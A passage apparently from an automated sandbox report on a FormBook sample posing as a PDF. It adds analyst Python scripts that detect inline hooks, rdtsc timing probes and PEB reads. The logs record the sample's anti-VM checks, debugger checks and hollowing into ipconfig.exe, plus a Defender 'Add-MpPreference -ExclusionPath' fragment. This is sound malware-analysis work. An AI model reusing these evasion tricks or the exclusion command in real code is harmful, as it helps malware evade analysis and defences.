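    if len(b) >= 12 and b[:2] == b"\x48\xB8" and b[10:12] == b"\xFF\xE0":   # mov rax, imm64; jmp rax
        return ("mov_rax_jmp", struct.unpack_from("<Q", b, 2)[0])
    return ("modified_unknown", None)


def changed_span(pristine: bytes, current: bytes) -> Tuple[int, int]:
    """Offset and length of the rewritten prefix, the way the report prints 'new code'."""
    n = min(len(pristine), len(current))
    diff = [i for i in range(n) if pristine[i] != current[i]]
    if not diff:
        return (0, 0)
    return (diff[0], diff[-1] - diff[0] + 1)


# Constructed pristine prologue (sub rsp, 28h; mov rax, ...) and the bytes the
# report lists as the new code at user32!PeekMessageA inside explorer.exe.
PRISTINE_PROLOGUE = b"\x48\x83\xEC\x28\x48\x8B\xC4"
REPORT_NEW_CODE = b"\x48\x8B\xB8\x88\x8E\xE3"
FUNC_VA = 0x7FFE0000  # assumed address, for the arithmetic only

if __name__ == "__main__":
    print(classify_hook(FUNC_VA, PRISTINE_PROLOGUE, REPORT_NEW_CODE), changed_span(PRISTINE_PROLOGUE, REPORT_NEW_CODE))
    print(classify_hook(FUNC_VA, PRISTINE_PROLOGUE, b"\xE9\x00\x10\x00\x00"))
```

Two caveats for anyone turning this into a scanner: the pristine copy must be the mapped image with relocations applied, or every relative operand in the prologue shows up as a false diff; and a hit is a lead, not a verdict, because EDR agents, anti-cheat software and application-compatibility shims patch user32 and ntdll exports the same way.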
Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: INQUIRY 1820521 pdf.exe PID: 6928, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000000A098E4 second address: 0000000000A098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000000A09B5E second address: 0000000000A09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00409A90 rdtsc 9_2_00409A90
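The RDTSC probe the sandbox intercepted is two `rdtsc` instructions six bytes apart with the low half of the first count stashed in ecx in between; the payload compares the delta against a threshold, since a hypervisor that traps or virtualises the time-stamp counter, or a tracing tool stepping the code, inflates it. The same addresses recur in ipconfig.exe at the same page offsets (0x4098E4 vs 0xA098E4), which is the unpacked FormBook image mapped into the hollowed process at a different base. The block below is an added example, not tooling from the report: it scans a code region for closely spaced `rdtsc` pairs and for the PEB reads through fs:[30h] that the report lists further down under the debugger checks, and goes beyond the report by also recognising the x64 gs:[60h] form. The code bytes are constructed from the instruction listing above (one valid encoding of each instruction was chosen) and placed so the first `rdtsc` falls at 0x4098E4.

```python
from typing import Dict, List, Tuple

RDTSC = b"\x0F\x31"
# PEB reads: fs:[30h] holds the PEB pointer in a 32-bit TEB, gs:[60h] in a 64-bit one.
PEB_READS: Dict[str, bytes] = {
    "mov eax, fs:[30h]": b"\x64\xA1\x30\x00\x00\x00",
    "mov eax, fs:[30h] (ModRM form)": b"\x64\x8B\x05\x30\x00\x00\x00",
    "mov ecx, fs:[30h]": b"\x64\x8B\x0D\x30\x00\x00\x00",
    "mov rax, gs:[60h] (x64)": b"\x65\x48\x8B\x04\x25\x60\x00\x00\x00",
}


def find_all(hay: bytes, needle: bytes) -> List[int]:
    hits, i = [], hay.find(needle)
    while i != -1:
        hits.append(i)
        i = hay.find(needle, i + 1)
    return hits


def rdtsc_pairs(code: bytes, base: int, window: int = 32) -> List[Tuple[int, int]]:
    """Consecutive rdtsc within `window` bytes of each other: the shape of a timing probe."""
    offs = find_all(code, RDTSC)
    return [(base + a, base + b) for a, b in zip(offs, offs[1:]) if b - a <= window]


def peb_reads(code: bytes, base: int) -> List[Tuple[int, str]]:
    """Addresses of direct PEB reads (BeingDebugged / NtGlobalFlag style checks)."""
    found = [(base + off, name) for name, pat in PEB_READS.items() for off in find_all(code, pat)]
    return sorted(found)


# Constructed code bytes: the report's probe (rdtsc; xor ecx,ecx; add ecx,eax; rdtsc)
# positioned so the first rdtsc lands at 0x4098E4, then a PEB read, then a lone
# rdtsc far enough away that it is not paired.
BASE = 0x4098DC
CODE = (b"\x90" * 8
        + b"\x0F\x31" + b"\x31\xC9" + b"\x01\xC1" + b"\x0F\x31"
        + b"\x90" * 6
        + b"\x64\xA1\x30\x00\x00\x00"
        + b"\x90" * 64
        + b"\x0F\x31")

if __name__ == "__main__":
    for first, second in rdtsc_pairs(CODE, BASE):
        print(f"rdtsc pair: {first:#010x} -> {second:#010x}")
    for addr, what in peb_reads(CODE, BASE):
        print(f"PEB read at {addr:#010x}: {what}")
```

A linear byte scan has no notion of instruction boundaries, so `0F 31` inside an immediate or a displacement also matches; the pairing window cuts most of that noise, and for anything beyond triage the hits should be confirmed with a disassembler on the unpacked image (here the 9.2 unpack at 0x400000 that the Yara rules matched).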
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe TID: 6932 | Thread sleep time: -100694s >= -30000s
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe TID: 6960 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 4200 | Thread sleep time: -58000s >= -30000s
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6828 | Thread sleep time: -55000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Thread delayed: delay time: 100694
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Thread delayed: delay time: 922337203685477
Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000A.00000000.701320132.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000A.00000000.697754798.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.690336891.000000000B5A7000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA;|Y
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000A.00000002.917434939.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000A.00000000.701814701.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000A.00000000.702010106.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_00409A90 rdtsc 9_2_00409A90
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0040ACD0 LdrLoadDll, 9_2_0040ACD0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0155B944 mov eax, dword ptr fs:[00000030h] 9_2_0155B944
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0155B944 mov eax, dword ptr fs:[00000030h] 9_2_0155B944
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153B171 mov eax, dword ptr fs:[00000030h] 9_2_0153B171
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153B171 mov eax, dword ptr fs:[00000030h] 9_2_0153B171
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153C962 mov eax, dword ptr fs:[00000030h] 9_2_0153C962
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01539100 mov eax, dword ptr fs:[00000030h] 9_2_01539100
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01539100 mov eax, dword ptr fs:[00000030h] 9_2_01539100
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01539100 mov eax, dword ptr fs:[00000030h] 9_2_01539100
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0156513A mov eax, dword ptr fs:[00000030h] 9_2_0156513A
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0156513A mov eax, dword ptr fs:[00000030h] 9_2_0156513A
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01554120 mov eax, dword ptr fs:[00000030h] 9_2_01554120
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01554120 mov eax, dword ptr fs:[00000030h] 9_2_01554120
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01554120 mov eax, dword ptr fs:[00000030h] 9_2_01554120
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01554120 mov eax, dword ptr fs:[00000030h] 9_2_01554120
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01554120 mov ecx, dword ptr fs:[00000030h] 9_2_01554120
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0153B1E1
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0153B1E1
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0153B1E1
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015C41E8 mov eax, dword ptr fs:[00000030h] 9_2_015C41E8
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01562990 mov eax, dword ptr fs:[00000030h] 9_2_01562990
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0156A185 mov eax, dword ptr fs:[00000030h] 9_2_0156A185
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0155C182 mov eax, dword ptr fs:[00000030h] 9_2_0155C182
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h] 9_2_015B51BE
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h] 9_2_015B51BE
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h] 9_2_015B51BE
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h] 9_2_015B51BE
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015661A0 mov eax, dword ptr fs:[00000030h] 9_2_015661A0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015661A0 mov eax, dword ptr fs:[00000030h] 9_2_015661A0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015B69A6 mov eax, dword ptr fs:[00000030h] 9_2_015B69A6
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01550050 mov eax, dword ptr fs:[00000030h] 9_2_01550050
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01550050 mov eax, dword ptr fs:[00000030h] 9_2_01550050
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01601074 mov eax, dword ptr fs:[00000030h] 9_2_01601074
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015F2073 mov eax, dword ptr fs:[00000030h] 9_2_015F2073
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015B7016 mov eax, dword ptr fs:[00000030h] 9_2_015B7016
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015B7016 mov eax, dword ptr fs:[00000030h] 9_2_015B7016
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015B7016 mov eax, dword ptr fs:[00000030h] 9_2_015B7016
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01604015 mov eax, dword ptr fs:[00000030h] 9_2_01604015
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01604015 mov eax, dword ptr fs:[00000030h] 9_2_01604015
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0156002D mov eax, dword ptr fs:[00000030h] 9_2_0156002D
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0156002D mov eax, dword ptr fs:[00000030h] 9_2_0156002D
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0156002D mov eax, dword ptr fs:[00000030h] 9_2_0156002D
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0156002D mov eax, dword ptr fs:[00000030h] 9_2_0156002D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]9_2_0156002D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]9_2_0154B02A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]9_2_0154B02A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]9_2_0154B02A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]9_2_0154B02A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov ecx, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015358EC mov eax, dword ptr fs:[00000030h]9_2_015358EC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539080 mov eax, dword ptr fs:[00000030h]9_2_01539080
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B3884 mov eax, dword ptr fs:[00000030h]9_2_015B3884
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B3884 mov eax, dword ptr fs:[00000030h]9_2_015B3884
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156F0BF mov ecx, dword ptr fs:[00000030h]9_2_0156F0BF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156F0BF mov eax, dword ptr fs:[00000030h]9_2_0156F0BF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156F0BF mov eax, dword ptr fs:[00000030h]9_2_0156F0BF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015790AF mov eax, dword ptr fs:[00000030h]9_2_015790AF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153F358 mov eax, dword ptr fs:[00000030h]9_2_0153F358
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153DB40 mov eax, dword ptr fs:[00000030h]9_2_0153DB40
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01563B7A mov eax, dword ptr fs:[00000030h]9_2_01563B7A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01563B7A mov eax, dword ptr fs:[00000030h]9_2_01563B7A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153DB60 mov ecx, dword ptr fs:[00000030h]9_2_0153DB60
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608B58 mov eax, dword ptr fs:[00000030h]9_2_01608B58
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F131B mov eax, dword ptr fs:[00000030h]9_2_015F131B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B53CA mov eax, dword ptr fs:[00000030h]9_2_015B53CA
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B53CA mov eax, dword ptr fs:[00000030h]9_2_015B53CA
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155DBE9 mov eax, dword ptr fs:[00000030h]9_2_0155DBE9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562397 mov eax, dword ptr fs:[00000030h]9_2_01562397
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01605BA5 mov eax, dword ptr fs:[00000030h]9_2_01605BA5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156B390 mov eax, dword ptr fs:[00000030h]9_2_0156B390
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F138A mov eax, dword ptr fs:[00000030h]9_2_015F138A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01541B8F mov eax, dword ptr fs:[00000030h]9_2_01541B8F
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01541B8F mov eax, dword ptr fs:[00000030h]9_2_01541B8F
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015ED380 mov ecx, dword ptr fs:[00000030h]9_2_015ED380
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564BAD mov eax, dword ptr fs:[00000030h]9_2_01564BAD
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564BAD mov eax, dword ptr fs:[00000030h]9_2_01564BAD
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564BAD mov eax, dword ptr fs:[00000030h]9_2_01564BAD
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608A62 mov eax, dword ptr fs:[00000030h]9_2_01608A62
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FEA55 mov eax, dword ptr fs:[00000030h]9_2_015FEA55
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015C4257 mov eax, dword ptr fs:[00000030h]9_2_015C4257
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]9_2_01539240
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]9_2_01539240
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]9_2_01539240
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]9_2_01539240
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0157927A mov eax, dword ptr fs:[00000030h]9_2_0157927A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015EB260 mov eax, dword ptr fs:[00000030h]9_2_015EB260
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015EB260 mov eax, dword ptr fs:[00000030h]9_2_015EB260
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01535210 mov eax, dword ptr fs:[00000030h]9_2_01535210
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01535210 mov ecx, dword ptr fs:[00000030h]9_2_01535210
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01535210 mov eax, dword ptr fs:[00000030h]9_2_01535210
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01535210 mov eax, dword ptr fs:[00000030h]9_2_01535210
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153AA16 mov eax, dword ptr fs:[00000030h]9_2_0153AA16
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153AA16 mov eax, dword ptr fs:[00000030h]9_2_0153AA16
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01553A1C mov eax, dword ptr fs:[00000030h]9_2_01553A1C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FAA16 mov eax, dword ptr fs:[00000030h]9_2_015FAA16
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FAA16 mov eax, dword ptr fs:[00000030h]9_2_015FAA16
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01548A0A mov eax, dword ptr fs:[00000030h]9_2_01548A0A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01574A2C mov eax, dword ptr fs:[00000030h]9_2_01574A2C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01574A2C mov eax, dword ptr fs:[00000030h]9_2_01574A2C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562ACB mov eax, dword ptr fs:[00000030h]9_2_01562ACB
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562AE4 mov eax, dword ptr fs:[00000030h]9_2_01562AE4
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156D294 mov eax, dword ptr fs:[00000030h]9_2_0156D294
